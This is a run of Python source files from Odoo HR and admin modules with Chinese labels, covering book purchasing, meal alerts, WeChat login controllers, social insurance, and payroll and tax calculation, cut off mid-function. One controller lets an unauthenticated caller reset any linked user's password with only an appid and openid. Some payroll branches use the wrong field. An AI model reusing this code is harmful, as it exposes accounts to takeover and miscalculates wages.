company_id = fields.Many2one('res.company', '公司', default=lambda self: self.env.user.company_id.id)
user_id = fields.Many2one(comodel_name="res.users", string="采购人", default=lambda self: self.env.user.id)
purchase_date = fields.Date(string="采购日期", default=fields.Date.context_today)
state = fields.Selection(string="状态", selection=PURCHASESTATE, default='draft')
notes = fields.Text(string="备注")
line_ids = fields.One2many(comodel_name="odoo.books.purchase.line", inverse_name="purchase_id", string="采购列表")
@api.model
def create(self, values):
values['code'] = self.env['ir.sequence'].sudo().next_by_code('odoo.books.purchase.code')
return super(BooksPurchase, self).create(values)
def submit_purchase(self):
"""
确认采购
:return:
"""
for res in self:
res.write({'state': 'purchase'})
for line in res.line_ids:
if line.number < 1:
raise UserError("采购数量不正确,请纠正!")
def confirm_purchase(self):
"""
完成采购,写入图书信息
:return:
"""
for res in self:
res.write({'state': 'confirm'})
for line in res.line_ids:
line.book_id.write({
'number': line.book_id.number + line.number
})
def return_draft(self):
"""
退回
:return:
"""
for res in self:
res.write({'state': 'draft'})
def close_apply(self):
"""
作废
:return:
"""
for res in self:
res.write({'state': 'close'})
def unlink(self):
for res in self:
if res.state != 'draft':
raise UserError("非草稿单据不允许删除!")
return super(BooksPurchase, self).unlink()
class BooksPurchaseLine(models.Model):
_description = '图书采购列表'
_name = 'odoo.books.purchase.line'
_rec_name = 'purchase_id'
purchase_id = fields.Many2one(comodel_name="odoo.books.purchase", string="图书采购", ondelete='set null')
book_id = fields.Many2one(comodel_name="odoo.books", string="图书名称", required=True)
code = fields.Char(string="图书编号")
type_id = fields.Many2one(comodel_name="odoo.books.type", string="图书类型")
author = fields.Char(string="作者")
version = fields.Char(string="版本")
number = fields.Integer(string="数量", default=1)
price = fields.Float(string="单价(¥)")
book_time = fields.Datetime(string="预计到货时间")
@api.onchange('book_id')
def _onchange_book_id(self):
"""
:return:
"""
if self.book_id:
self.code = self.book_id.code
self.type_id = self.book_id.type_id.id
self.author = self.book_id.author
self.version = self.book_id.version
self.price = self.book_id.price
```
#### File: odoo_book_meal/models/meal_alert.py
```python
import datetime
import logging
from odoo import api, fields, models, _
_logger = logging.getLogger(__name__)
class MealAlert(models.Model):
_name = 'odoo.meal.alert'
_description = '公告消息'
_rec_name = 'message'
ALERTSTATE = [
('specific', '指定日'),
('week', '每周'),
('days', '每天')
]
display = fields.Boolean(compute='_compute_display_get')
message = fields.Text('信息', required=True)
alert_type = fields.Selection(ALERTSTATE, string='类型', required=True, index=True, default='specific')
partner_id = fields.Many2one('res.partner', string="供应商")
specific_day = fields.Date('日期', default=fields.Date.context_today)
monday = fields.Boolean('星期一')
tuesday = fields.Boolean('星期二')
wednesday = fields.Boolean('星期三')
thursday = fields.Boolean('星期四')
friday = fields.Boolean('星期五')
saturday = fields.Boolean('星期六')
sunday = fields.Boolean('星期日')
start_hour = fields.Float('介于', oldname='active_from', required=True, default=7)
end_hour = fields.Float('和', oldname='active_to', required=True, default=23)
active = fields.Boolean(default=True)
@api.multi
def name_get(self):
return [(alert.id, '%s %s' % (_('公告'), '#%d' % alert.id)) for alert in self]
@api.depends('alert_type', 'specific_day', 'monday', 'tuesday', 'thursday', 'friday', 'saturday', 'sunday', 'start_hour', 'end_hour')
def _compute_display_get(self):
days_codes = {
'0': 'sunday',
'1': 'monday',
'2': 'tuesday',
'3': 'wednesday',
'4': 'thursday',
'5': 'friday',
'6': 'saturday'
}
fullday = False
now = datetime.datetime.now()
if self.env.context.get('lunch_date'):
lunch_date = fields.Datetime.from_string(self.env.context['lunch_date'])
fullday = lunch_date > now
now = max(lunch_date, now)
mynow = fields.Datetime.context_timestamp(self, now)
for alert in self:
can_display_alert = {
'specific': (str(alert.specific_day) == fields.Date.to_string(mynow)),
'week': alert[days_codes[mynow.strftime('%w')]],
'days': True
}
if can_display_alert[alert.alert_type]:
hour_to = int(alert.end_hour)
min_to = int((alert.end_hour - hour_to) * 60)
to_alert = datetime.time(hour_to, min_to)
hour_from = int(alert.start_hour)
min_from = int((alert.start_hour - hour_from) * 60)
from_alert = datetime.time(hour_from, min_from)
if fullday or (from_alert <= mynow.time() <= to_alert):
alert.display = True
else:
alert.display = False
```
#### File: odoo_hcm/controllers/res_users.py
```python
import json
import logging
from odoo import http, _
from odoo.addons.web.controllers.main import ensure_db, Home
from odoo.http import request
from . import api_tool
_logger = logging.getLogger(__name__)
class ResUserAPI(Home, http.Controller):
@http.route('/api/wx/users/password/update', type='http', auth='none', methods=['get', 'post'], csrf=False)
def api_wx_users_update_pwd(self, **kw):
"""
修改用户密码: 需要先检查员工对应的系统用户,存在系统用户时才允许修改密码
:param kw:(openid appid password
:return:
"""
params_data = request.params.copy()
if not api_tool.check_api_access(params_data.get('appid')):
return json.dumps({'state': False, 'msg': '拒绝访问'})
openid = params_data.get('openid')
password = params_data.get('password')
if not openid or not password:
return json.dumps({'state': False, 'msg': '参数不正确'})
# 查询是否已绑定员工
employee = request.env['hr.employee'].sudo().search([('wx_openid', '=', openid)])
if not employee:
return json.dumps({'state': False, 'msg': '未绑定员工,不需要修改密码!'})
if not employee.user_id:
return json.dumps({'state': False, 'msg': '员工没有关联登录系统的用户账户,不需要修改密码操作!'})
employee.user_id.sudo().write({
'password': password
})
return json.dumps({'state': True, 'msg': '新的密码已生效!'})
```
#### File: odoo_hcm/controllers/weixin_api.py
```python
import logging
import requests
from odoo.http import Controller, route, json, request
from . import api_tool
logger = logging.getLogger(__name__)
class WeiXinApiInterface(Controller):
"""微信api接口"""
@route('/api/wx/openid/get', type='http', auth='none', methods=['get', 'post'], csrf=False)
def wx_get_openid(self, **kw):
"""
用appid和secret到微信api中换取微信用户openid
:param kw:
:return: openid
"""
wx_code = request.params['usercode']
app_id = request.params['appid']
secret = request.params['secret']
if not wx_code or not app_id or not secret:
return False
if not api_tool.check_api_access(app_id):
return False
url = "https://api.weixin.qq.com/sns/jscode2session?"
new_url = "{}appid={}&secret={}&js_code={}&grant_type=authorization_code".format(url, app_id, secret, wx_code)
result = requests.get(url=new_url, timeout=5)
result = json.loads(result.text)
return result['openid']
@route('/api/wx/employee/check/openid', type='http', auth='none', methods=['get', 'post'], csrf=False)
def wx_check_employee_openid(self, **kw):
"""
根据微信openid查询员工是否存在
:param kw:
:return:
"""
app_id = request.params['appid']
openid = request.params['openid']
if not openid:
return json.dumps({'state': False, 'msg': '未检测到openid参数'})
if not api_tool.check_api_access(app_id):
return json.dumps({'state': False, 'msg': '拒绝访问'})
employee = request.env['hr.employee'].sudo().search([('wx_openid', '=', openid)])
if not employee:
return json.dumps({'state': False, 'msg': '未绑定员工'})
return json.dumps({'state': True, 'msg': '已绑定员工'})
@route('/api/wx/openid/get_and_check', type='http', auth='none', methods=['get', 'post'], csrf=False)
def wx_get_openid_and_check_openid(self, **kw):
"""
用appid和secret到微信api中换取微信用户openid,然后在系统中查看是否已绑定员工,返回查询绑定的结果和openid
:param kw:
:return:
"""
params = request.params.copy()
wx_code = params.get('usercode')
app_id = params.get('appid')
secret = params.get('secret')
if not wx_code or not app_id or not secret:
return json.dumps({'state': False, 'msg': '参数不正确'})
if not api_tool.check_api_access(app_id):
return json.dumps({'state': False, 'msg': '拒绝访问'})
url = "https://api.weixin.qq.com/sns/jscode2session?"
new_url = "{}appid={}&secret={}&js_code={}&grant_type=authorization_code".format(url, app_id, secret, wx_code)
result = requests.get(url=new_url, timeout=5)
result = json.loads(result.text)
employee = request.env['hr.employee'].sudo().search([('wx_openid', '=', result['openid'])], limit=1)
if not employee:
return json.dumps({'state': False, 'msg': '未绑定员工', 'openid': result['openid']})
employee_data = api_tool.create_employee_data(employee)
return json.dumps({'state': True, 'msg': '已绑定员工', 'openid': result['openid'], 'employee': employee_data})
@route('/api/wx/post/message', type='http', auth='none', methods=['get', 'post'], csrf=False)
def get_wx_post_message(self, **kw):
"""
接受微信端用户发给小程序的消息以及开发者需要的事件推送
:param kw:
:return:
"""
# 示例消息体:
# 'signature', '82c88ea4f7380758928f594cad9606ad56eef537'), ('echostr', '760986963397047803'), ('timestamp', '1568289201'), ('nonce', '1232323960')
params = request.params.copy()
logging.info("-----微信推送消息-------")
logging.info(params)
logging.info("-----json-str-end-------")
return params.get('echostr')
# token = "<PASSWORD>"
# EncodingAESKey = "<KEY>"
```
#### File: odoo_social_security/models/insured_scheme_emp.py
```python
import logging
from odoo import api, fields, models, _
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class InsuredSchemeEmployee(models.Model):
_description = '参保员工'
_name = 'insured.scheme.employee'
_rec_name = 'name'
_order = 'id'
active = fields.Boolean(string=u'Active', default=True)
payment_method = fields.Selection(string=u'缴纳方式', selection=[('company', '公司自缴'), ('other', '其他'), ], default='company')
company_id = fields.Many2one('res.company', '公司', default=lambda self: self.env.user.company_id, index=True)
employee_id = fields.Many2one(comodel_name='hr.employee', string=u'参保员工', index=True, copy=False)
department_id = fields.Many2one(comodel_name='hr.department', string=u'所属部门', index=True, copy=False)
scheme_id = fields.Many2one(comodel_name='insured.scheme', string=u'参保方案')
social_security_start_date = fields.Date(string=u'社保起始日期')
public_fund_start_date = fields.Date(string=u'公积金起始日期')
notes = fields.Text(string=u'备注')
name = fields.Char(string="真实姓名", required=True)
phone = fields.Char(string="手机号码")
identification = fields.Char(string="身份证号码")
state = fields.Selection(string=u'状态', selection=[('normal', '正常'), ('pause', '暂停'), ('close', '停保')], default='normal')
ttype = fields.Selection(string="参保类型", selection=[('new', '新参保'), ('on', '续保'), ], default='new')
@api.onchange('employee_id')
def _onchange_employee_id(self):
for res in self:
if res.employee_id:
res.department_id = res.employee_id.department_id.id
res.name = res.employee_id.name
res.phone = res.employee_id.work_phone
@api.constrains('employee_id')
def _constrains_employee(self):
for res in self:
emp_count = self.search_count([('employee_id', '=', res.employee_id.id)])
if emp_count > 1:
raise UserError(_("该员工已是参保状态"))
def state_to_pause(self):
for res in self:
res.state = 'pause'
def state_to_normal(self):
for res in self:
res.state = 'normal'
def state_to_close(self):
for res in self:
res.state = 'close'
def action_insured(self):
"""
调整到该员工的月结账单
"""
for res in self:
action = self.env.ref('odoo_social_security.insured_monthly_statement_action').read()[0]
action['domain'] = [('employee_id', '=', res.employee_id.id)]
return action
```
#### File: odoo_wage_manage/models/wage_calculate_salary_rules.py
```python
import logging
from odoo import api, fields, models
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class WageCalculateSalaryRules(models.Model):
_description = '计薪规则'
_name = 'wage.calculate.salary.rules'
_rec_name = 'name'
name = fields.Char(string='规则名称')
notes = fields.Text(string=u'备注')
PLSELECTION = [('dingding', '从钉钉花名册提取'), ('odoo', '从Odoo员工提取')]
personnel_information = fields.Selection(string=u'人事信息', selection=PLSELECTION, default='dingding')
FIXEDSELECTION = [
('00', '基本工资'),
('01', '基本工资+薪资档案(薪资项目金额总和)'),
]
fixed_salary = fields.Selection(string=u'固定工资', selection=FIXEDSELECTION, default='01')
PERFORMANCESELECTION = [('import', '每月手动导入')]
performance_bonus = fields.Selection(string=u'绩效奖金', selection=PERFORMANCESELECTION, default='import')
leave_selection = [
('00', '基本工资/应出勤天数/8*请假小时'),
('01', '基本工资/应出勤天数*请假小时'),
('02', '(按次数) 次数*每次事假扣款'),
]
leave_deduction = fields.Selection(string=u'事假扣款规则', selection=leave_selection, default='00')
hour_leave_number = fields.Integer(string=u'多少小时算1次事假')
leave_money = fields.Float(string=u'每次事假扣款', digits=(10, 2))
sick_selection = [
('00', '基本工资/2/应出勤天数/8*请假小时'),
('01', '基本工资/应出勤天数*请假小时*病假扣款比例'),
('02', '基本工资/应出勤天数*请假小时/8*病假扣款比例'),
('03', '(按次数) 次数*每次病假扣款'),
]
sick_deduction = fields.Selection(string=u'病假扣款规则', selection=sick_selection, default='00')
hour_sick_number = fields.Integer(string=u'多少小时算1次病假')
sick_money = fields.Float(string=u'每次病假扣款', digits=(10, 2))
sick_deduction_ratio = fields.Float(string=u'病假扣款比例', digits=(10, 2))
work_overtime_selection = [
('00', '基本工资/应出勤天数/8*加班小时*倍数'),
('01', '加班小时*固定金额'),
]
work_overtime_deduction = fields.Selection(string=u'工作日加班规则', selection=work_overtime_selection, default='00')
work_overtime_money = fields.Float(string=u'固定金额', digits=(10, 2))
work_overtime_multiple = fields.Float(string=u'倍数', digits=(10, 1))
weekend_selection = [
('00', '基本工资/应出勤天数/8*加班小时*倍数'),
('01', '加班小时*固定金额'),
]
weekend_deduction = fields.Selection(string=u'周末加班规则', selection=weekend_selection, default='00')
weekend_money = fields.Float(string=u'固定金额', digits=(10, 2))
weekend_multiple = fields.Float(string=u'倍数', digits=(10, 1))
holiday_selection = [
('00', '基本工资/应出勤天数/8*加班小时*倍数'),
('01', '加班小时*固定金额'),
]
holiday_deduction = fields.Selection(string=u'节假日加班规则', selection=holiday_selection, default='00')
holiday_money = fields.Float(string=u'固定金额', digits=(10, 2))
holiday_multiple = fields.Float(string=u'倍数', digits=(10, 1))
# -----考勤------
late_attendance_selection = [
('00', '迟到次数*扣款金额'),
]
late_attendance_deduction = fields.Selection(string=u'考勤迟到规则', selection=late_attendance_selection, default='00')
late_attendance_money = fields.Float(string=u'扣款金额', digits=(10, 2))
notsigned_selection = [
('00', '忘记打款次数*扣款金额'),
]
notsigned_deduction = fields.Selection(string=u'忘记打卡规则', selection=notsigned_selection, default='00')
notsigned_money = fields.Float(string=u'扣款金额', digits=(10, 2))
early_selection = [
('00', '早退次数*扣款金额'),
]
early_deduction = fields.Selection(string=u'早退打卡规则', selection=early_selection, default='00')
early_money = fields.Float(string=u'扣款金额', digits=(10, 2))
@api.multi
def compute_leave_deduction(self, base_wage, days, hours):
"""
计算事假
:param base_wage: 基本工资
:param days: 出勤天数
:param hours: 事假缺勤小时
:return:
"""
if self.leave_deduction == '00':
# ('基本工资/应出勤天数/8*请假小时'
return base_wage / days / 8 * hours
elif self.leave_deduction == '01':
# '基本工资/应出勤天数*请假小时'
return base_wage / days * hours
else:
# (按次数) 次数*每次事假扣款
return (hours / self.hour_leave_number) * self.leave_money
@api.multi
def compute_sick_absence(self, base_wage, days, hours):
"""
计算病假扣款
:param base_wage:
:param days:
:param hours:
:return:
"""
if self.sick_deduction == '00':
# 基本工资/2/应出勤天数/8*请假小时
return base_wage/2/days/8*hours
elif self.sick_deduction == '01':
# 基本工资/应出勤天数*请假小时*病假扣款比例
return base_wage / days * hours * self.sick_deduction_ratio
elif self.sick_deduction == '02':
# 基本工资/应出勤天数*请假小时/8*病假扣款比例
return base_wage / days * hours / 8 * self.sick_deduction_ratio
else:
# (按次数) 次数*每次病假扣款')
return int(hours/self.hour_sick_number) * self.sick_money
@api.multi
def compute_work_overtime(self, base_wage, days, hours):
"""
计算工作日加班费用
:param base_wage:
:param days:
:param hours:
:return:
"""
if self.work_overtime_deduction == '00':
# 基本工资/应出勤天数/8*加班小时*倍数
return base_wage/days/8*hours*self.work_overtime_multiple
else:
# 加班小时*固定金额
return hours * self.work_overtime_money
@api.multi
def compute_weekend_overtime(self, base_wage, days, hours):
"""
计算周末加班费用
:param base_wage:
:param days:
:param hours:
:return:
"""
if self.weekend_deduction == '00':
# 基本工资/应出勤天数/8*加班小时*倍数
return base_wage/days/8*hours*self.weekend_multiple
else:
# 加班小时*固定金额
return hours * self.weekend_multiple
@api.multi
def compute_holiday_overtime(self, base_wage, days, hours):
"""
计算节假日加班费用
:param base_wage:
:param days:
:param hours:
:return:
"""
if self.holiday_deduction == '00':
# 基本工资/应出勤天数/8*加班小时*倍数
return base_wage/days/8*hours*self.holiday_multiple
else:
# 加班小时*固定金额
return hours * self.holiday_money
@api.multi
def compute_late_attendance(self, attendance_num):
"""
计算迟到扣款费用
:param attendance_num:
:return:
"""
if self.late_attendance_deduction == '00':
# 迟到次数*扣款金额
return attendance_num * self.late_attendance_money
else:
return 0
@api.multi
def compute_notsigned_attendance(self, attendance_num):
"""
计算忘记打卡扣款费用
:param attendance_num:
:return:
"""
if self.notsigned_deduction == '00':
# 忘记打款次数*扣款金额
return attendance_num * self.notsigned_money
else:
return 0
@api.multi
def compute_early_attendance(self, attendance_num):
"""
计算早退扣款费用
:param attendance_num:
:return:
"""
if self.early_deduction == '00':
# 早退次数*扣款金额
return attendance_num * self.early_money
else:
return 0
```
#### File: odoo_wage_manage/wizard/wage_employee_tax_details.py
```python
import logging
from odoo import api, fields, models
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class WageEmployeeTaxDetailsTransient(models.TransientModel):
_name = 'wage.employee.tax.details.transient'
_description = "初始化员工个税"
start_date = fields.Date(string=u'年开始日期', required=True)
end_date = fields.Date(string=u'年结束日期', required=True)
year = fields.Char(string='年份')
emp_ids = fields.Many2many('hr.employee', string=u'员工', required=True)
all_emp = fields.Boolean(string=u'全部员工?')
@api.onchange('all_emp')
def onchange_all_emp(self):
"""
获取全部员工
:return:
"""
if self.all_emp:
employees = self.env['hr.employee'].search([])
self.emp_ids = [(6, 0, employees.ids)]
@api.onchange('start_date')
def _alter_form_year(self):
"""
根据日期生成年份
:return:
"""
for res in self:
if res.start_date:
res.date_code = str(res.start_date)[:4]
@api.multi
def init_employee_tax_details(self):
"""
初始化员工个税
:return:
"""
self.ensure_one()
year = str(self.start_date)[:4]
line_list = self._get_detail_line()
for emp in self.emp_ids:
detail_data = {
'employee_id': emp.id,
'start_date': self.start_date,
'end_date': self.end_date,
'year': year,
'line_ids': line_list,
}
domain = [('employee_id', '=', emp.id), ('year', '=', year)]
details = self.env['wage.employee.tax.details'].sudo().search(domain)
if not details:
self.env['wage.employee.tax.details'].create(detail_data)
return {'type': 'ir.actions.act_window_close'}
@api.model
def _get_detail_line(self):
# 默认加载12个月份到列表
line_list = list()
i = 1
while i < 13:
if i < 10:
line_list.append((0, 0, {
'month': "0{}".format(str(i)),
}))
else:
line_list.append((0, 0, {
'month': str(i),
}))
i += 1
return line_list
```
#### File: odoo_wage_manage/wizard/wage_payroll_accounting.py
```python
import logging
from odoo import api, fields, models
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class WagePayrollAccountingTransient(models.TransientModel):
_name = 'wage.payroll.accounting.transient'
_description = "薪资计算"
wage_date = fields.Date(string=u'核算月份', required=True, default=fields.date.today())
date_code = fields.Char(string='期间代码')
emp_ids = fields.Many2many('hr.employee', string=u'员工')
all_emp = fields.Boolean(string=u'全部员工?')
@api.onchange('all_emp')
def onchange_all_emp(self):
"""
获取全部员工
:return:
"""
if self.all_emp:
employees = self.env['hr.employee'].search([])
self.emp_ids = [(6, 0, employees.ids)]
else:
self.emp_ids = False
@api.onchange('wage_date')
def _alter_date_code(self):
"""
根据日期生成期间代码
:return:
"""
for res in self:
if res.wage_date:
wage_date = str(res.wage_date)
res.date_code = "{}/{}".format(wage_date[:4], wage_date[5:7])
def compute_payroll_accounting(self):
"""
计算薪资
:return:
"""
self.ensure_one()
wage_date = str(self.wage_date)
date_code = "{}/{}".format(wage_date[:4], wage_date[5:7])
# 获取应出勤天数
attendance_days = self.env['wage.attend.days.config'].get_month_attend_day(date_code[:4], date_code[5:7])
# 获取薪酬计算规则
rules = self.env['wage.calculate.salary.rules'].search([], limit=1)
if not rules:
raise UserError("请先配置一个薪资计算规则!")
for emp in self.emp_ids:
payroll_data = {
'wage_date': self.wage_date,
'date_code': date_code,
'employee_id': emp.id,
'department_id': emp.department_id.id if emp.department_id else False,
'job_id': emp.job_id.id if emp.job_id else False,
'attendance_days': attendance_days,
}
# 获取员工薪资合同
contract = self.env['hr.contract'].search([('employee_id', '=', emp.id), ('state', '=', 'open')], limit=1)
base_wage = performance_amount_sum = structure_amount_sum = 0 # 基本工资,绩效合计,薪资结构合计金额
structure_ids = list()
performance_ids = list()
statement_ids = list()
if contract:
# 读取薪资档案中员工薪资结构数据
structure_ids, structure_amount_sum = contract.get_employee_wage_structure()
base_wage = contract.wage
# 获取绩效列表
domain = [('employee_id', '=', emp.id), ('performance_code', '=', date_code)]
performance = self.env['wage.employee.performance.manage'].search(domain, limit=1)
if performance:
performance_ids, performance_amount_sum = performance.get_emp_performance_list()
# 获取社保月结账单
statement_ids = provident_ids = False
domain = [('employee_id', '=', emp.id), ('date_code', '=', date_code)]
statements = self.env['insured.monthly.statement'].search(domain, limit=1)
if statements:
statement_ids, provident_ids = statements.get_employee_all_list()
payroll_data.update({
'base_wage': base_wage, # 基本工资
'structure_ids': structure_ids, # 薪资结构
'performance_ids': performance_ids, # 绩效列表
'statement_ids': statement_ids or False, # 社保
'provident_ids': provident_ids or False, # 公积金
})
# 获取员工考勤统计表
domain = [('employee_id', '=', emp.id), ('attend_code', '=', date_code)]
attendance = self.env['wage.employee.attendance.annal'].search(domain, limit=1)
absence_amount_sum = overtime_amount_sum = attendance_amount_sum = 0
if attendance:
# 计算事假
leave_absence = rules.compute_leave_deduction(base_wage, attendance_days, attendance.leave_absence_hour)
# 计算病假
sick_absence = rules.compute_sick_absence(base_wage, attendance_days, attendance.sick_absence_hour)
# 工作日加班费
work_overtime = rules.compute_work_overtime(base_wage, attendance_days, attendance.work_overtime_hour)
# 周末加班费
weekend_overtime = rules.compute_weekend_overtime(base_wage, attendance_days, attendance.weekend_overtime_hour)
# 节假日加班费
holiday_overtime = rules.compute_holiday_overtime(base_wage, attendance_days, attendance.holiday_overtime_hour)
# 迟到扣款
late_attendance = rules.compute_late_attendance(attendance.late_attendance_num)
# 忘记打卡扣款
notsigned_attendance = rules.compute_notsigned_attendance(attendance.notsigned_attendance_num)
# 早退扣款
early_attendance = rules.compute_early_attendance(attendance.early_attendance_num)
payroll_data.update({
'leave_absence': leave_absence,
'sick_absence': sick_absence,
'work_overtime': work_overtime,
'weekend_overtime': weekend_overtime,
'holiday_overtime': holiday_overtime,
'late_attendance': late_attendance,
'notsigned_attendance': notsigned_attendance,
'early_attendance': early_attendance,
})
absence_amount_sum = leave_absence + sick_absence
overtime_amount_sum = work_overtime+weekend_overtime+holiday_overtime
attendance_amount_sum = late_attendance+notsigned_attendance+early_attendance
# 计算应发工资
# 应发工资=基本工资+薪资结构+绩效合计-缺勤扣款合计+加班费合计-打卡扣款合计
pay_wage = base_wage+structure_amount_sum+performance_amount_sum-absence_amount_sum+overtime_amount_sum-attendance_amount_sum
payroll_data.update({'pay_wage': pay_wage})
payroll_data = self._compute_employee_tax(pay_wage, payroll_data, emp, date_code)
# 判断是否已存在该期间的员工核算信息
domain = [('employee_id', '=', emp.id), ('date_code', '=', date_code)]
payrolls = self.env['wage.payroll.accounting'].search(domain)
if not payrolls:
self.env['wage.payroll.accounting'].create(payroll_data)
else:
if payrolls.state == 'draft':
payrolls.write({
'structure_ids': [(2, payrolls.structure_ids.ids)],
'performance_ids': [(2, payrolls.performance_ids.ids)],
'statement_ids': [(2, payrolls.statement_ids.ids)],
})
payrolls.write(payroll_data)
else:
raise UserError("核算单:({})已不是待审核确认阶段,请先反审核后再重新计算!".format(payrolls[0].name))
return {'type': 'ir.actions.act_window_close'}
# 计算个税
@api.model
def _compute_employee_tax(self, pay_wage, payroll_data, emp, date_code):
"""
:param pay_wage:应发工资
:param payroll_data:
:param emp:
:param date_code:期间
:return:
"""
month_code = date_code[5:7]
# 获取个税明细
emp_tax = self.env['wage.employee.tax.details'].sudo().search([('employee_id', '=', emp.id), ('year', '=', date_code[:4])], limit=1)
if not emp_tax:
raise UserError("员工'%s'不存在年度'%s'个税明细!请先创建或初始化..." % (emp.name, date_code[:4]))
# 获取专项附加扣除
domain = [('employee_id', '=', emp.id), ('date_code', '=', date_code)]
deduction = self.env['wage.special.additional.deduction'].sudo().search(domain, limit=1)
cumulative_expenditure_deduction = 0
cumulative_support_for_the_elderly = 0
cumulative_continuing_education_deduction = 0
cumulative_home_loan_interest_deduction = 0
cumulative_housing_rental_expense_deduction = 0
if deduction:
cumulative_expenditure_deduction = deduction.cumulative_expenditure_deduction
cumulative_support_for_the_elderly = deduction.cumulative_support_for_the_elderly
cumulative_continuing_education_deduction = deduction.cumulative_continuing_education_deduction
cumulative_home_loan_interest_deduction = deduction.cumulative_home_loan_interest_deduction
cumulative_housing_rental_expense_deduction = deduction.cumulative_housing_rental_expense_deduction
# 累计个税抵扣总额
total_tax_deduction = cumulative_expenditure_deduction + cumulative_support_for_the_elderly + cumulative_continuing_education_deduction + \
cumulative_home_loan_interest_deduction + cumulative_housing_rental_expense_deduction
cumulative_tax_pay = 0 # 累计计税工资
exemption = 0 # 累计免征额
cumulative_actual_tax = 0 # 累计实际个税
lsy_tax_wage = 0 # 历史月份计税工资
for line in emp_tax.line_ids:
# 获取月份的前一个月
if int(month_code) == 1:
exemption = 5000
elif int(month_code)-1 == int(line.month):
exemption += line.accumulated_exemption + 5000
cumulative_tax_pay = line.cumulative_tax_pay + pay_wage
cumulative_actual_tax = line.cumulative_actual_tax
# 获取累计计税工资、累计实际个税
if int(line.month) < int(month_code):
lsy_tax_wage += line.taxable_salary_this_month
# 累计应税工资 = 本月计税工资 + 历史月份计税工资 - 累计个税抵扣 - 累计免税额
cumulative_tax = pay_wage + lsy_tax_wage - total_tax_deduction - exemption
# 累计应扣个税 税率 速算扣除数
accumulated_deductible_tax, tax, quick_deduction = self._compute_cumulative_tax_payable_by_number(cumulative_tax)
# 本月个税 = 累计应扣个税 - 累计实际个税
this_months_tax = accumulated_deductible_tax - cumulative_actual_tax
# 创建该员工个税明细
tax_data = {
'month': month_code,
'taxable_salary_this_month': pay_wage,
'cumulative_tax_pay': cumulative_tax_pay,
'cumulative_tax_deduction': total_tax_deduction,
'accumulated_exemption': exemption,
'cumulative_taxable_wage': cumulative_tax,
'tax': tax,
'quick_deduction': quick_deduction,
'accumulated_deductible_tax': accumulated_deductible_tax,
'this_months_tax': this_months_tax,
'cumulative_actual_tax': accumulated_deductible_tax,
}
emp_tax.set_employee_tax_detail(month_code, tax_data)
# 将个税明细封装到薪资核算data中
payroll_data.update({
'cumulative_expenditure_deduction': cumulative_expenditure_deduction,
'cumulative_home_loan_interest_deduction': cumulative_home_loan_interest_deduction,
'cumulative_housing_rental_expense_deduction': cumulative_housing_rental_expense_deduction,
'cumulative_support_for_the_elderly': cumulative_support_for_the_elderly,
'cumulative_continuing_education_deduction': cumulative_continuing_education_deduction,
'cumulative_total_tax_deduction': total_tax_deduction, # 累计个税抵扣总额
'taxable_salary_this_month': pay_wage, # 本月计税工资
'cumulative_tax_pay': cumulative_tax_pay, # 累计计税工资
'tax_rate': tax, # 税率
'quick_deduction': quick_deduction, # 速算扣除数
'this_months_tax': this_months_tax, # 本月个税
'cumulative_tax': cumulative_tax, # 累计个税
'real_wage': pay_wage - this_months_tax, # 实发工资
})
return payroll_data
@api.model
def _compute_cumulative_tax_payable_by_number(self, number):
"""
根据"累计应税工资"计算 累计应纳税额
居民工资、薪金个人所得税预扣预缴税率表
级数 累计应税工资(累计应税工资) 预扣率(%) 速算扣除数
1 不超过36000元的部分 3 0
2 超过36000元至144000元的部分 10 2520
3 超过144000元至300000元的部分 20 16920
4 超过300000元至420000元的部分 25 31920
5 超过420000元至660000元的部分 30 52920
6 超过660000元至960000元的部分 35 85920
7 超过960000元的部分 45 181920
:param number: 累计应税工资
:return: 累计应纳税额
"""
result = 0.0
tax = 0
quick_deduction = 0
if number <= 36000:
result = number * 0.03 - 0
tax = 0.03
quick_deduction = 0
elif 36000 < number <= 144000:
result = number * 0.10 - 2520
tax = 0.10
quick_deduction = 2520
elif 144000 < number <= 300000:
result = number * 0.20 - 16920
tax = 0.20
quick_deduction = 16920
elif 300000 < number <= 420000:
result = number * 0.25 - 31920
tax = 0.25
quick_deduction = 31920
elif 420000 < number <= 660000:
result = number * 0.30 - 52920
tax = 0.30
quick_deduction = 52920
elif 660000 < number <= 960000:
result = number * 0.35 - 85920
tax = 0.35
quick_deduction = 85920
elif number >= 960000:
result = number * 0.45 - 181920
tax = 0.45
quick_deduction = 181920
return result, tax, quick_deduction
class PayrollAccountingToPayslipTransient(models.TransientModel):
_name = 'wage.payroll.accounting.to.payslip.transient'
_description = "生成工资条"
start_date = fields.Date(string=u'所属期起', required=True)
end_date = fields.Date(string=u'所属期止', required=True)
date_code = fields.Char(string='期间')
emp_ids = fields.Many2many('hr.employee', string=u'员工', required=True)
all_emp = fields.Boolean(string=u'全部员工?')
@api.onchange('all_emp')
def onchange_all_emp(self):
"""
获取全部员工
:return:
"""
if self.all_emp:
employees = self.env['hr.employee'].search([])
self.emp_ids = [(6, 0, employees.ids)]
else:
self.emp_ids = [(2, 0, self.emp_ids)]
@api.onchange('start_date')
def _alter_date_code(self):
"""
根据日期生成期间代码
:return:
"""
for res in self:
if res.start_date:
start_date = str(res.start_date)
res.date_code = "{}/{}".format(start_date[:4], start_date[5:7])
def create_employee_payslip(self):
"""
生成工资条
:return:
"""
self.ensure_one()
start_date = str(self.start_date)
date_code = "{}/{}".format(start_date[:4], start_date[5:7])
for emp in self.emp_ids:
payroll_data = {
'start_date': self.start_date,
'end_date': self.end_date,
'date_code': date_code,
'employee_id': emp.id,
'department_id': emp.department_id.id if emp.department_id else False,
'job_id': emp.job_id.id if emp.job_id else False,
}
# 获取薪资核算明细
domain = [('employee_id', '=', emp.id), ('date_code', '=', date_code)]
payroll = self.env['wage.payroll.accounting'].search(domain, limit=1)
if payroll:
payroll_data.update({
'base_wage': payroll.base_wage, # 基本工资
'structure_wage': 0, # 薪资项目
'absence_sum': payroll.absence_sum, # 缺勤扣款合计
'performance_sum': payroll.performance_sum, # 绩效合计
'overtime_sum': payroll.overtime_sum, # 加班费合计
'attendance_sum': payroll.attendance_sum, # 打卡扣款合计
'this_months_tax': payroll.this_months_tax, # 本月个税
'pay_wage': payroll.pay_wage, # 应发工资
'real_wage': payroll.real_wage, # 实发工资
'structure_sum': payroll.structure_sum, # 薪资项目合计
})
# 创建工资单
domain = [('employee_id', '=', emp.id), ('date_code', '=', date_code)]
